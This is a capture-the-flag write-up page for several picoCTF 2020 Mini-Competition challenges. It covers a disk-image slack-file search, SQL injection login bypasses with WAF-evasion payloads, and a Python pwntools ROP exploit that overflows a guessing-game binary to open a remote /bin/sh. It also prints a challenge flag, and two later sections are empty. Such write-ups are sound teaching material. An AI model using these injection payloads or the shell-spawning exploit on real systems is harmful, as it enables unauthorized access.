picoCTF 2020 Mini-Competition

Pitter, Patter, Platters (Autopsy)
Solved by ret2basic
Challenge
'Suspicious' is written all over this disk image. Download suspicious.dd.sda1​
Solution
Open the .sda file in Autopsy. Click "Keyword Search" and search for the keyword "suspicious". Here we find two files:
suspicious-file.txt
suspicious-file.txt-slack
suspicious-file.txt says:
1
suspicious-file.txt Nothing to see here! But you may want to look here -->
2
​
3
​
4
------------------------------METADATA------------------------------
Copied!
suspicious-file.txt-slack says:
1
suspicious-file.txt-slack }dc7079dd_3<_|Lm_111t5_3b{FTCocip
Copied!
File slack is the difference between the physical file size and the logical file size. Autopsy creates slack files (with the -slack extension) from any extra space at the end of a file. These files can be displayed or hidden from the data sources area and/or the views area. Go to "Tools => Options => Global Settings => Hide slack files in the:" and unselect the options in this section.
Reverse the string and get flag:
1
echo '}dc7079dd_3<_|Lm_111t5_3b{FTCocip' | rev
Copied!
Web Gauntlet (SQLite Injection with WAF Bypass)
Solved by ret2basic
Challenge
Can you beat the filters? Log in as admin http://jupiter.challenges.picoctf.org:44979/ http://jupiter.challenges.picoctf.org:44979/filter.php​
Solution
Background Knowledge
If we enter user:password on the login page, the backend SQL query will be something like this:
1
SELECT * FROM users WHERE username='user' AND password='solarwinds123';
Copied!
Typically the very first payload for testing SQLi is ' or 1=1;--, which results in the following SQL query:
1
SELECT * FROM users WHERE username='' or 1=1;-- AND password='solarwinds123';
Copied!
Here the leading ' closes the username field and anything comes after -- is considered as comment (hence ignored). Since '' evaluates to False and 1=1 evaluates to True, the entire SQL statement always evaluates to True.
Round 1
Filter: or
In this round, the boolean expression or is filtered. We have to come up with a different payload. Alternatively, since the SQL default admin user is named admin, one possible payload without using or is admin';--. The corresponding SQL query is:
1
SELECT * FROM users WHERE username='admin';--' AND password='solarwinds123';
Copied!
The SQL query got executed is shown in the background:
Round 1 Done
Round 2
Filter: or and like = --
For this round, simply remove the -- from the payload for Round 1. The corresponding SQL query is:
1
SELECT * FROM users WHERE username='admin';' AND password='solarwinds123';
Copied!
This query is still semantically correct since ; closes the statement SELECT * FROM users WHERE username='admin':
Round 2 Done
Round 3
Filter: or and = like > < --
The payload for Round 2 works for this round as well:
Round 4
Filter: or and = like > < -- admin
Since admin is filtered, we have to come up with another approach. A typical solution for such filter is the UNION attack. The UNION keyword in SQL allows multiple SQL statements to be executed. For example:
1
SELECT Alice, Bob FROM good_people UNION SELECT Eve, Mallory FROM bad_people
Copied!
In our case, we could construct an UNION attack as the following:
1
SELECT * FROM users WHERE username='ret2basic' UNION SELECT * FROM users LIMIT 1;' AND password='solarwinds123';
Copied!
However, this payload does not work since space is filtered. To bypass this filter, let's replace all spaces with /**/ (empty comment is equivalent to space):
1
SELECT * FROM users WHERE username='ret2basic'/**/UNION/**/SELECT/**/*/**/FROM/**/users/**/LIMIT/**/1;' AND password='solarwinds123';
Copied!
This payload works:
Round 4 Done
Round 5
Filter: or and = like > < -- union admin
Since union is filtered in this round, we should switch back to the admin';-- idea. There are two things that need to be changed:
1.Since admin is filtered, we could split admin into adm'||'in, where || is used for concatenating strings in SQL.
2.Since -- is filtered, we could replace ;-- with /* to comment out the things that we don't need.
The complete SQL query is:
1
SELECT * FROM users WHERE username='adm'||'in'/*' AND password='solarwinds123';
Copied!
Now go grab your flag:
Round 5 Done
Appendix: Source Code
1
<?php
2
session_start();
3
​
4
if (!isset($_SESSION["round"])) {
5
    $_SESSION["round"] = 1;
6
}
7
$round = $_SESSION["round"];
8
$filter = array("");
9
$view = ($_SERVER["PHP_SELF"] == "/filter.php");
10
​
11
if ($round === 1) {
12
    $filter = array("or");
13
    if ($view) {
14
        echo "Round1: ".implode(" ", $filter)."<br/>";
15
    }
16
} else if ($round === 2) {
17
    $filter = array("or", "and", "like", "=", "--");
18
    if ($view) {
19
        echo "Round2: ".implode(" ", $filter)."<br/>";
20
    }
21
} else if ($round === 3) {
22
    $filter = array(" ", "or", "and", "=", "like", ">", "<", "--");
23
    // $filter = array("or", "and", "=", "like", "union", "select", "insert", "delete", "if", "else", "true", "false", "admin");
24
    if ($view) {
25
        echo "Round3: ".implode(" ", $filter)."<br/>";
26
    }
27
} else if ($round === 4) {
28
    $filter = array(" ", "or", "and", "=", "like", ">", "<", "--", "admin");
29
    // $filter = array(" ", "/**/", "--", "or", "and", "=", "like", "union", "select", "insert", "delete", "if", "else", "true", "false", "admin");
30
    if ($view) {
31
        echo "Round4: ".implode(" ", $filter)."<br/>";
32
    }
33
} else if ($round === 5) {
34
    $filter = array(" ", "or", "and", "=", "like", ">", "<", "--", "union", "admin");
35
    // $filter = array("0", "unhex", "char", "/*", "*/", "--", "or", "and", "=", "like", "union", "select", "insert", "delete", "if", "else", "true", "false", "admin");
36
    if ($view) {
37
        echo "Round5: ".implode(" ", $filter)."<br/>";
38
    }
39
} else if ($round >= 6) {
40
    if ($view) {
41
        highlight_file("filter.php");
42
    }
43
} else {
44
    $_SESSION["round"] = 1;
45
}
46
​
47
// picoCTF{y0u_m4d3_1t_16f769e719ab9d3e310fd13dc1262ee1}
48
?>
Copied!
Guessing Game 1 (ret2syscall)
Solved by ret2basic
Challenge
I made a simple game to show off my programming skills. See if you can beat it! vuln vuln.c Makefile nc jupiter.challenges.picoctf.org 26735
Makefile
1
all:
2
        gcc -m64 -fno-stack-protector -O0 -no-pie -static -o vuln vuln.c
3
​
4
clean:
5
        rm vuln
Copied!
The binary is statically linked, so things like ret2libc won't work.
Source Code
1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <unistd.h>
4
#include <sys/types.h>
5
#include <sys/stat.h>
6
​
7
#define BUFSIZE 100
8
​
9
​
10
long increment(long in) {
11
    return in + 1;
12
}
13
​
14
long get_random() {
15
    return rand() % BUFSIZE;
16
}
17
​
18
int do_stuff() {
19
    long ans = get_random();
20
    ans = increment(ans);
21
    int res = 0;
22
​
23
    printf("What number would you like to guess?\n");
24
    char guess[BUFSIZE];
25
    fgets(guess, BUFSIZE, stdin);
26
​
27
    long g = atol(guess);
28
    if (!g) {
29
        printf("That's not a valid number!\n");
30
    } else {
31
        if (g == ans) {
32
            printf("Congrats! You win! Your prize is this print statement!\n\n");
33
            res = 1;
34
        } else {
35
            printf("Nope!\n\n");
36
        }
37
    }
38
    return res;
39
}
40
​
41
void win() {
42
    char winner[BUFSIZE];
43
    printf("New winner!\nName? ");
44
    fgets(winner, 360, stdin);
45
    printf("Congrats %s\n\n", winner);
46
}
47
​
48
int main(int argc, char **argv){
49
    setvbuf(stdout, NULL, _IONBF, 0);
50
    // Set the gid to the effective gid
51
    // this prevents /bin/sh from dropping the privileges
52
    gid_t gid = getegid();
53
    setresgid(gid, gid, gid);
54
​
55
    int res;
56
​
57
    printf("Welcome to my guessing game!\n\n");
58
​
59
    while (1) {
60
        res = do_stuff();
61
        if (res) {
62
            win();
63
        }
64
    }
65
​
66
    return 0;
67
}
Copied!
Note that the function get_random() does not return a random number at all since rand() is unseeded. To confirm:
1
#include <stdio.h>
2
#include <stdlib.h>
3
​
4
#define BUFSIZE 100
5
​
6
long get_random()
7
{
8
    return rand() % BUFSIZE;
9
}
10
​
11
int main(int argc, char **argv)
12
{
13
    printf("%ld\n", get_random());
14
}
Copied!
The output is 83, no matter how many times you run it.
Also, pay attention to these two lines of the source code:
1
    long ans = get_random(); // ans = 83
2
    ans = increment(ans); // ans = 84
Copied!
The correct answer to the question "What number would you like to guess?" should be 84.
Solution
Since the binary does not contain the string "/bin/sh\x00", we have to construct a 2-stage exploit:
Stage 1: Build a ROP chain for writing the string "/bin/sh\x00" to a writable memory location. A common choice is the .bss section. The address of .bss can be found using Pwntools elf.bss() method.
Stage 2: Do normal ret2syscall to execute execve("/bin/sh\x00", 0, 0).
Exploit
1
#!/usr/bin/env python3
2
from pwn import *
3
​
4
#--------Setup--------#
5
​
6
context(arch='amd64', os='linux')
7
elf = ELF("./vuln", checksec=False)
8
​
9
local = False
10
if local:
11
    r = elf.process()
12
else:
13
    host = 'jupiter.challenges.picoctf.org'
14
    port = 26735
15
    r = remote(host, port)
16
​
17
#--------ret2syscall--------#
18
​
19
offset = 120
20
pop_rax = 0x00000000004163f4
21
write_gadget = 0x000000000048dd71
22
bin_sh_address = elf.bss()
23
pop_rdi = 0x0000000000400696
24
pop_rsi = 0x0000000000410ca3
25
pop_rdx = 0x000000000044a6b5
26
syscall = 0x000000000040137c
27
​
28
payload = flat(
29
    b"A" * offset,
30
    
31
    # Write the string "/bin/sh\x00" to .bss section
32
    pop_rdx, "/bin/sh\x00",
33
    pop_rax, bin_sh_address,
34
    write_gadget,
35
    
36
    # Call execve("/bin/sh\x00", 0, 0)
37
    pop_rax, 0x3b,
38
    pop_rdi, bin_sh_address,
39
    pop_rsi, 0,
40
    pop_rdx, 0,
41
    syscall,
42
)
43
​
44
r.sendlineafter("What number would you like to guess?\n", '84')
45
r.sendlineafter("Name? ", payload)
46
r.interactive()
Copied!
Guessing Game 2
Solved by ret2basic
Challenge
It's the Return of your favorite game! vuln vuln.c Makefile nc jupiter.challenges.picoctf.org 57529
Makefile
1
all:
2
        gcc -m32 -no-pie -Wl,-z,relro,-z,now -o vuln vuln.c
3
​
4
clean:
5
        rm vuln
Copied!
The binary is dynamically linked this time, which makes ret2libc possible.
Source Code
1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <unistd.h>
4
#include <sys/types.h>
5
#include <sys/stat.h>
6
​
7
#define BUFSIZE 512
8
​
9
​
10
long get_random() {
11
    return rand;
12
}
13
​
14
int get_version() {
15
    return 2;
16
}
17
​
18
int do_stuff() {
19
    long ans = (get_random() % 4096) + 1;
20
    int res = 0;
21
​
22
    printf("What number would you like to guess?\n");
23
    char guess[BUFSIZE];
24
    fgets(guess, BUFSIZE, stdin);
25
​
26
    long g = atol(guess);
27
    if (!g) {
28
        printf("That's not a valid number!\n");
29
    } else {
30
        if (g == ans) {
31
            printf("Congrats! You win! Your prize is this print statement!\n\n");
32
            res = 1;
33
        } else {
34
            printf("Nope!\n\n");
35
        }
36
    }
37
    return res;
38
}
39
​
40
void win() {
41
    char winner[BUFSIZE];
42
    printf("New winner!\nName? ");
43
    gets(winner);
44
    printf("Congrats: ");
45
    printf(winner);
46
    printf("\n\n");
47
}
48
​
49
int main(int argc, char **argv){
50
    setvbuf(stdout, NULL, _IONBF, 0);
51
    // Set the gid to the effective gid
52
    // this prevents /bin/sh from dropping the privileges
53
    gid_t gid = getegid();
54
    setresgid(gid, gid, gid);
55
​
56
    int res;
57
​
58
    printf("Welcome to my guessing game!\n");
59
    printf("Version: %x\n\n", get_version());
60
​
61
    while (1) {
62
        res = do_stuff();
63
        if (res) {
64
            win();
65
        }
66
    }
67
​
68
    return 0;
69
}
Copied!
Solution
Exploit
1
​
Copied!
OPT Implementation
Challenge
Yay reversing! Relevant files: otp flag.txt​
Solution
Implementation
1
​
Copied!
Crypto - Previous
Jarvis OJ Crypto RSA Series
Next - picoCTF
picoCTF 2021
Last modified 1mo ago